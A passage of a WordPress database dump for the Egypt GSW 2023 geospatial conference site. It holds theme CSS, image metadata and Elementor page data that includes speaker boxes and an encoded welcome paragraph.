none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-7fd6db3d6608e1a162a1c50b88305d0a.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(5843,2372,'_dp_original','51'),
(5844,2372,'_edit_lock','1675491978:1'),
(5846,2374,'_wp_attached_file','2020/05/mmp.jpg'),
(5847,2374,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:400;s:6:\"height\";i:300;s:4:\"file\";s:15:\"2020/05/mmp.jpg\";s:8:\"filesize\";i:51846;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:15:\"mmp-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:15:\"mmp-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9195;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:12:\"Getty Images\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:37:\"This content is subject to copyright.\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(5854,2372,'_edit_last','1'),
(5892,2372,'_dt_microsite_primary_menu','5'),
(5893,2372,'_dt_microsite_split_left_menu','5'),
(5894,2372,'_dt_microsite_split_right_menu','5'),
(5895,2372,'_dt_microsite_mobile_menu','5'),
(5896,2372,'_dt_page_overrides_right_margin',''),
(5897,2372,'_dt_page_overrides_left_margin',''),
(5898,2372,'_dt_mobile_page_padding_top',''),
(5899,2372,'_dt_mobile_page_padding_right',''),
(5900,2372,'_dt_mobile_page_padding_bottom',''),
(5901,2372,'_dt_mobile_page_padding_left',''),
(5902,7,'_elementor_css','a:6:{s:4:\"time\";i:1665108159;s:5:\"fonts\";a:2:{i:0;s:6:\"Roboto\";i:1;s:11:\"Roboto Slab\";}s:5:\"icons\";a:0:{}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),
(5904,2372,'_thumbnail_id','3274'),
(5914,388,'the7_shortcodes_dynamic_css','a:7:{i:0;s:0:\"\";s:32:\"a15b3007dec5944ad8c2fdee312e720d\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-a15b3007dec5944ad8c2fdee312e720d.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-a15b3007dec5944ad8c2fdee312e720d.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-a15b3007dec5944ad8c2fdee312e720d .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-a15b3007dec5944ad8c2fdee312e720d .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"518391c1259627a892d1c6bfa51930cd\";s:185:\"#default-btn-518391c1259627a892d1c6bfa51930cd.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-518391c1259627a892d1c6bfa51930cd > i {\n  margin-right: 8px;\n}\n\";s:32:\"2824c5488349b72b4daf16aa981a390b\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-2824c5488349b72b4daf16aa981a390b.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-2824c5488349b72b4daf16aa981a390b.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-2824c5488349b72b4daf16aa981a390b .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-2824c5488349b72b4daf16aa981a390b .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"25fc5b19ea281169dc928be45ca93e85\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-25fc5b19ea281169dc928be45ca93e85.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-25fc5b19ea281169dc928be45ca93e85.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-25fc5b19ea281169dc928be45ca93e85 .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-25fc5b19ea281169dc928be45ca93e85 .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"15f4348319a8e952696079a194e5245b\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-15f4348319a8e952696079a194e5245b.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-15f4348319a8e952696079a194e5245b.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-15f4348319a8e952696079a194e5245b .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: solid;\n  border-width: 0px;\n}\n.dt-icon-bg-on.shortcode-single-image-wrap.shortcode-single-image-15f4348319a8e952696079a194e5245b .rollover-icon {\n  background: rgba(255,255,255,0.3);\n  box-shadow: none;\n}\n\";s:32:\"ac9e5d1914c617283a59c4170879eff0\";s:185:\"#default-btn-ac9e5d1914c617283a59c4170879eff0.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 8px;\n}\n#default-btn-ac9e5d1914c617283a59c4170879eff0 > i {\n  margin-right: 8px;\n}\n\";}'),
(5915,51,'_edit_lock','1665146264:1'),
(5916,2379,'_elementor_edit_mode','builder'),
(5917,2379,'_wpb_shortcodes_custom_css','.vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}.vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}.vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}.vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}.vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}.vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}'),
(5918,2379,'_wp_page_template','default'),
(5919,2379,'_elementor_template_type','wp-page'),
(5920,2379,'_elementor_version','3.7.8'),
(5921,2379,'_elementor_data','[{\"id\":\"38ea82b7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"49efd0ba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23e903ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[vc_row equal_height=\\\"yes\\\" content_placement=\\\"middle\\\" type=\\\"vc_default\\\" margin_top=\\\"5\\\" margin_bottom=\\\"10\\\" css=\\\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\\\"][vc_column parallax=\\\"content-moving\\\" offset=\\\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\\\"][ultimate_heading main_heading=\\\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\\\" sub_heading_color=\\\"#333333\\\" spacer=\\\"line_only\\\" spacer_position=\\\"middle\\\" line_height=\\\"5\\\" line_color=\\\"\\\" main_heading_style=\\\"font-weight:bold;\\\" main_heading_font_size=\\\"desktop:44px;tablet_portrait:30px;\\\" main_heading_line_height=\\\"desktop:54px;tablet_portrait:40px;\\\" main_heading_margin=\\\"margin-bottom:10px;\\\" line_width=\\\"150\\\" el_class=\\\"accent-border-color\\\" sub_heading_style=\\\"font-style:italic;\\\" sub_heading_font_size=\\\"desktop:22px;mobile_landscape:16px;\\\" sub_heading_line_height=\\\"desktop:32px;mobile_landscape:26px;\\\" spacer_margin=\\\"margin-bottom:40px;\\\" sub_heading_margin=\\\"margin-bottom:70px;\\\"][\\/ultimate_heading][vc_row_inner css=\\\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\\\"][vc_column_inner width=\\\"5\\/12\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2271|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\\\" img_width=\\\"100\\\" title=\\\"Prof. Ismail AbdelGhafar\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport<\\/strong><\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][vc_column_inner width=\\\"1\\/3\\\"][bsf-info-box icon_type=\\\"custom\\\" icon_img=\\\"id^2272|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2022\\/10\\/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\\\" img_width=\\\"100\\\" icon_style=\\\"advanced\\\" icon_border_spacing=\\\"100\\\" title=\\\"Prof. Naser El-Sheimy\\\" heading_tag=\\\"h5\\\" read_more=\\\"box\\\" link=\\\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\\\" hover_effect=\\\"style_2\\\" pos=\\\"top\\\" el_class=\\\"accent-icon-bg\\\" title_font_size=\\\"desktop:22px;\\\" title_font_line_height=\\\"desktop:32px;\\\"]<\\/p>\\n<h6>Geospatial Week Director ,The University of Calgary<\\/h6>\\n<p>[\\/bsf-info-box][\\/vc_column_inner][\\/vc_row_inner][\\/vc_column][\\/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[\\/vc_raw_html][\\/vc_column][\\/vc_row][vc_row bg_type=\\\"image\\\" parallax_style=\\\"vcpb-vz-jquery\\\" bg_image_new=\\\"id^1900|url^https:\\/\\/gsw2023.com\\/wp-content\\/uploads\\/2018\\/06\\/trade10.jpg|caption^null|alt^null|title^trade10|description^null\\\" parallax_sense=\\\"40\\\" 